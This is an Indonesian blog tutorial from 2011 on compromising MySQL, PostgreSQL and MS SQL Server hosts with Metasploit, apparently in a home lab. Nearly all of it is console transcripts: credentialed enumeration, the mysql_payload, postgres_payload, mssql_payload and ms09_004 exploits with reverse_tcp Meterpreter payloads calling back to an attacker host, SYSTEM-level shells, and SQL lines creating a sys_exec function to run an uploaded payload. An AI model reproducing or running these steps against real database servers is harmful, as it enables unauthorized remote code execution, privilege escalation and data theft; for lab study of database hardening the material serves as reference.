pentesting database server

ketika melakukan pentesting ke sebuah jaringan terkadang kita menemukan beberapa resouce jaringan antara lain web server,dns server,email dll.khusunya pentesting terhadap web server.jika kita melihat konfigurasi website,kadang – kadang database server yang digunakan terpisah dengan web servernya.so gimana caranya menguasai remote database server dengan mengetahui data – data penting misalnya username,password dan nama database yang digunakan..??

saya coba memberikan solusi terhadap kasus diatas.topologi yang digunakan bisa dilihat pada gambar.tool yang digunakan seperti biasanya.metasploit lagi.kebetulan bereapa bulan lalu ( lupa tepatnya )team metasploit menambahkan 2 module untuk database hacking antara lain module untuk mysql dan postgresql.

1.Mysql Server
pentesting terhadap mysql bisa dilakukan dengan beberapa cara,misalnya menggunakan metasploit ataupun dengan teknik mysql blob.tetapi intinya sama.menambahkan sebuah fungsi baru(user defined function) misalnya sys_eval ataupun sys_exec yang nantinya digunakan untuk mengeksekusi payload.untuke lebih jelasnya tentang UDF function bisa dilihat dari website http://www.mysqludf.org/

module yang digunakan ada beberapa macam ( auxiliary dan exploit ):

Auxiliary
=========

Name Description
—- —————-
admin/mysql/mysql_enum MySQL Enumeration Module
admin/mysql/mysql_sql MySQL SQL Generic Query

exploit

Name Description
—- —————-
windows/mysql/mysql_payload Oracle MySQL for Microsoft Windows Payload Execution

melihat konfigurasi mysql bisa menggunakan auxiliary admin/mysql/mysql_enum :

msf > use auxiliary/admin/mysql/mysql_enum
msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

Name Current Setting Required Description
—- ————— ——– ———–
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 3306 yes The target port
USERNAME no The username to authenticate as

msf auxiliary(mysql_enum) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_enum) > set PASSWORD ian123
PASSWORD => ian123
msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator…
[*] Enumerating Parameters
[*] MySQL Version: 5.5.11
[*] Compiled for the following OS: Win32
[*] Architecture: x86
[*] Server Hostname: vee-lab
[*] Data Directory: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.5\Data\
[*] Logging of queries and logins: OFF
[*] Old Password Hashing Algorithm OFF
[*] Loading of local files: ON
[*] Logins with old Pre-4.1 Passwords: OFF
[*] Allow Use of symlinks for Database Files: YES
[*] Allow Table Merge:
[*] SSL Connection: DISABLED

——— SNIPET ————–

untuk melakukan hacking terhadap database tersebut exploit mysql_payload :

sf > use exploit/windows/mysql/mysql_payload
msf exploit(mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mysql_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(mysql_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(mysql_payload) > set USERNAME root
USERNAME => root
msf exploit(mysql_payload) > set PASSWORD ian123
PASSWORD => ian123
msf exploit(mysql_payload) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.10.2:4444
msf exploit(mysql_payload) > [*] Checking target architecture…
[*] Checking for sys_exec()…
[*] Checking target architecture…
[*] Checking for MySQL plugin directory…
[*] Target arch (win32) and target path both okay.
[*] Uploading lib_mysqludf_sys_32.dll library to C:/Program Files/MySQL/MySQL Server 5.5/lib/plugin/itfkdrZG.dll…
[*] Checking for sys_exec()…
[*] Command Stager progress – 1.47% done (1499/102246 bytes)
[*] Command Stager progress – 2.93% done (2998/102246 bytes)
[*] Command Stager progress – 4.40% done (4497/102246 bytes)
[*] Command Stager progress – 5.86% done (5996/102246 bytes)
[*] Command Stager progress – 7.33% done (7495/102246 bytes)
[*] Command Stager progress – 8.80% done (8994/102246 bytes)
[*] Command Stager progress – 10.26% done (10493/102246 bytes)
[*] Command Stager progress – 11.73% done (11992/102246 bytes)
[*] Command Stager progress – 13.19% done (13491/102246 bytes)
[*] Command Stager progress – 14.66% done (14990/102246 bytes)
……………………………..
[*] Command Stager progress – 86.50% done (88441/102246 bytes)
[*] Command Stager progress – 87.96% done (89940/102246 bytes)
[*] Command Stager progress – 89.43% done (91439/102246 bytes)
[*] Command Stager progress – 90.90% done (92938/102246 bytes)
[*] Command Stager progress – 92.36% done (94437/102246 bytes)
[*] Command Stager progress – 93.83% done (95936/102246 bytes)
[*] Command Stager progress – 95.29% done (97435/102246 bytes)
[*] Command Stager progress – 96.76% done (98934/102246 bytes)
[*] Command Stager progress – 98.19% done (100400/102246 bytes)
[*] Command Stager progress – 99.59% done (101827/102246 bytes)
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Meterpreter session 1 opened (192.168.10.2:4444 -> 192.168.10.11:1041) at 2011-05-03 16:04:07 +0700
msf exploit(mysql_payload) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > ps

Process list
============

PID Name Arch Session User Path
— —- —- ——- —- —-
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
628 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
676 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
700 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
744 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
756 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
912 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
980 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1064 SbieSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Sandboxie\SbieSvc.exe
1080 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1208 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1240 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1588 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1644 explorer.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\Explorer.EXE
1736 ehtray.exe x86 0 LAHARISI\ian-lab1 C:\WINDOWS\ehome\ehtray.exe
1744 SharedIntApp.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\SIA\SharedIntApp.exe
1752 prl_cc.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Parallels\Parallels Tools\prl_cc.exe
1760 jusched.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Common Files\Java\Java Update\jusched.exe
1772 SbieCtrl.exe x86 0 LAHARISI\ian-lab1 C:\Program Files\Sandboxie\SbieCtrl.exe

2044 ehrecvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\eHome\ehRecvr.exe
144 ehSched.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\eHome\ehSched.exe
224 jqs.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Java\jre6\bin\jqs.exe
260 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
512 msmdsrv.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Server\MSSQL.2\OLAP\bin\msmdsrv.exe
528 mysqld.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\MySQL\MySQL Server 5.5\bin\mysqld.exe
……….
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
meterpreter > shell
Process 504 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.5\Data>

how it work:

mula – mula metasploit melakukan pengecekan terhadap server mysql,menentukan letak direktory plugin,menentukan arsitektur target.kemudian mengupload lib_mysqludf_sys_32.dll ( data/exploits/mysql/lib_mysqludf_sys_32.dll) ke plugin direktory.selanjutnya metasploit melakukan pengecekan terhadap fungsi sys_exec.jika fungsi tersebut tidak ada,maka metasploit akan membuat fungsi tersebut.fungsi akan dieksekusi dengan payload yang diupload sebagai parameter.
kalau ditulisakan dalam syntax mysql kurang lebih :
mysql> create function sys_exec returns string soname “name_library_yang diupload.dll”;
mysql> select sys_exec(‘c:\path\payload);

dari hasil diatas bisa dilihat bahwa ketika proses exploitasi berhasil,sekaligus berhasil melakukan privilege escalation karena service mysql dijalankan oleh System…

2.PostGreSQL
referensi exploit untuk postgresql antara lain :

admin/postgres/postgres_readfile PostgreSQL Server Generic Query
admin/postgres/postgres_sql PostgreSQL Server Generic Query
scanner/postgres/postgres_login PostgreSQL Login Utility
scanner/postgres/postgres_version PostgreSQL Version Probe
exploit
windows/postgres/postgres_payload 2009-04-10 PostgreSQL for Microsoft Windows Payload Execution

contoh exploitasi :

msf > use exploit/windows/postgres/postgres_payload
msf exploit(postgres_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(postgres_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(postgres_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(postgres_payload) > set USERNAME postgres
USERNAME => postgres
msf exploit(postgres_payload) > set PASSWORD ian123456
PASSWORD => ian123456
msf exploit(postgres_payload) > exploit -j
[*] Authentication successful and vulnerable version 8.3 on Windows confirmed
[*] Uploaded CHrzTDpZ.dll as OID 2461 to table ulbuaxkj(ipyumxky)
[*] Command Stager progress – 1.48% done (1499/101465 bytes)
[*] Command Stager progress – 2.95% done (2998/101465 bytes)
[*] Command Stager progress – 4.43% done (4497/101465 bytes)
[*] Command Stager progress – 5.91% done (5996/101465 bytes)
[*] Command Stager progress – 7.39% done (7495/101465 bytes)
[*] Command Stager progress – 8.86% done (8994/101465 bytes)
[*] Command Stager progress – 10.34% done (10493/101465 bytes)
[*] Command Stager progress – 11.82% done (11992/101465 bytes)
[*] Command Stager progress – 13.30% done (13491/101465 bytes)
[*] Command Stager progress – 14.77% done (14990/101465 bytes)
[*] Command Stager progress – 16.25% done (16489/101465 bytes)
[*] Command Stager progress – 17.73% done (17988/101465 bytes)
[*] Command Stager progress – 19.21% done (19487/101465 bytes)
[*] Command Stager progress – 20.68% done (20986/101465 bytes)
[*] Command Stager progress – 22.16% done (22485/101465 bytes)
[*] Command Stager progress – 23.64% done (23984/101465 bytes)
[*] Command Stager progress – 25.12% done (25483/101465 bytes)
[*] Command Stager progress – 26.59% done (26982/101465 bytes)
[*] Command Stager progress – 28.07% done (28481/101465 bytes)
[*] Command Stager progress – 29.55% done (29980/101465 bytes)
[*] Command Stager progress – 31.02% done (31479/101465 bytes)
[*] Command Stager progress – 32.50% done (32978/101465 bytes)
[*] Command Stager progress – 33.98% done (34477/101465 bytes)
[*] Command Stager progress – 35.46% done (35976/101465 bytes)
[*] Command Stager progress – 36.93% done (37475/101465 bytes)
……….
[*] Command Stager progress – 82.73% done (83944/101465 bytes)
[*] Command Stager progress – 84.21% done (85443/101465 bytes)
[*] Command Stager progress – 85.69% done (86942/101465 bytes)
[*] Command Stager progress – 87.16% done (88441/101465 bytes)
[*] Command Stager progress – 88.64% done (89940/101465 bytes)
[*] Command Stager progress – 90.12% done (91439/101465 bytes)
[*] Command Stager progress – 91.60% done (92938/101465 bytes)
[*] Command Stager progress – 93.07% done (94437/101465 bytes)
[*] Command Stager progress – 94.55% done (95936/101465 bytes)
[*] Command Stager progress – 96.03% done (97435/101465 bytes)
[*] Command Stager progress – 97.51% done (98934/101465 bytes)
[*] Command Stager progress – 98.95% done (100400/101465 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Command Stager progress – 100.00% done (101465/101465 bytes)
[*] Meterpreter session 2 opened (192.168.10.2:4444 -> 192.168.10.11:1050) at 2011-05-03 16:35:29 +0700

msf exploit(postgres_payload) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: LAHARISI\postgres
meterpreter > shell
Process 3248 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\PostgreSQL\8.3\data>

3.sql server
pentesting terhadap sql server tidak berbeda jauh dengan 2 database sebelumnya.cuma sql server mempunyai beberapa exploit yang mungkin cukup berguna selain mssql_payload.

msf > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf auxiliary(mssql_enum) > set USERNAME sa
USERNAME => sa
msf auxiliary(mssql_enum) > set PASSWORD ian123456
PASSWORD => ian123456
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration…
[*] Version:
[*] Microsoft SQL Server 2005 – 9.00.1399.06 (Intel X86)
[*] Oct 14 2005 00:33:37
[*] Copyright (c) 1988-2005 Microsoft Corporation
[*] Standard Edition on Windows NT 5.1 (Build 2600: Service Pack 3)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Database Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb

……………

exploitasi menggunakan mssql_payload

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(mssql_payload) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(mssql_payload) > set USERNAME sa
USERNAME => sa
msf exploit(mssql_payload) > set PASSWORD ian123456
PASSWORD => ian123456
msf exploit(mssql_payload) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.10.2:4444
msf exploit(mssql_payload) > [*] Command Stager progress – 1.47% done (1499/102246 bytes)
[*] Command Stager progress – 2.93% done (2998/102246 bytes)
[*] Command Stager progress – 4.40% done (4497/102246 bytes)
[*] Command Stager progress – 5.86% done (5996/102246 bytes)
[*] Command Stager progress – 7.33% done (7495/102246 bytes)
[*] Command Stager progress – 8.80% done (8994/102246 bytes)
[*] Command Stager progress – 10.26% done (10493/102246 bytes)
[*] Command Stager progress – 11.73% done (11992/102246 bytes)
[*] Command Stager progress – 13.19% done (13491/102246 bytes)
[*] Command Stager progress – 14.66% done (14990/102246 bytes)
[*] Command Stager progress – 16.13% done (16489/102246 bytes)
[*] Command Stager progress – 17.59% done (17988/102246 bytes)
[*] Command Stager progress – 19.06% done (19487/102246 bytes)
[*] Command Stager progress – 20.53% done (20986/102246 bytes)
[*] Command Stager progress – 21.99% done (22485/102246 bytes)
[*] Command Stager progress – 23.46% done (23984/102246 bytes)
[*] Command Stager progress – 24.92% done (25483/102246 bytes)
[*] Command Stager progress – 26.39% done (26982/102246 bytes)
………..
[*] Command Stager progress – 93.83% done (95936/102246 bytes)
[*] Command Stager progress – 95.29% done (97435/102246 bytes)
[*] Command Stager progress – 96.76% done (98934/102246 bytes)
[*] Command Stager progress – 98.19% done (100400/102246 bytes)
[*] Command Stager progress – 99.59% done (101827/102246 bytes)
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Command Stager progress – 100.00% done (102246/102246 bytes)
[*] Meterpreter session 4 opened (192.168.10.2:4444 -> 192.168.10.11:1052) at 2011-05-03 16:55:10 +0700

msf exploit(mssql_payload) > sessions -i 4
[*] Starting interaction with 4…

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4084 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

metasploit memastikan fasilitas xp_cmdshell sudah dienable.jika belum,metasploit akan meng-enable fasilitas tersebut.payload diupload kemudian dieksekusi dengan xp_cmdshell..

alternatif lain dengan memanfaatkan bug sql server :

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set LHOST 192.168.10.2
LHOST => 192.168.10.2
msf exploit(ms09_004_sp_replwritetovarbin) > set RHOST 192.168.10.11
RHOST => 192.168.10.11
msf exploit(ms09_004_sp_replwritetovarbin) > set USERNAME sa
USERNAME => sa
msf exploit(ms09_004_sp_replwritetovarbin) > set PASSWORD ian123456
PASSWORD => ian123456
msf exploit(ms09_004_sp_replwritetovarbin) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.10.2:4444
[*] Attempting automatic target detection…
msf exploit(ms09_004_sp_replwritetovarbin) > [*] Automatically detected target “MSSQL 2005 SP0 (9.00.1399.06)”
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (749056 bytes) to 192.168.10.11
[*] Meterpreter session 5 opened (192.168.10.2:4444 -> 192.168.10.11:1053) at 2011-05-03 17:03:34 +0700
msf exploit(ms09_004_sp_replwritetovarbin) > sessions -i 5
[*] Starting interaction with 5…

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3204 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

selamat menikmati..

— happy hacking —

Ld Ian Hrm a.k.a laharisi

Posted on May 3, 2011, in database, Hacking & security and tagged , , , , , , , . Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: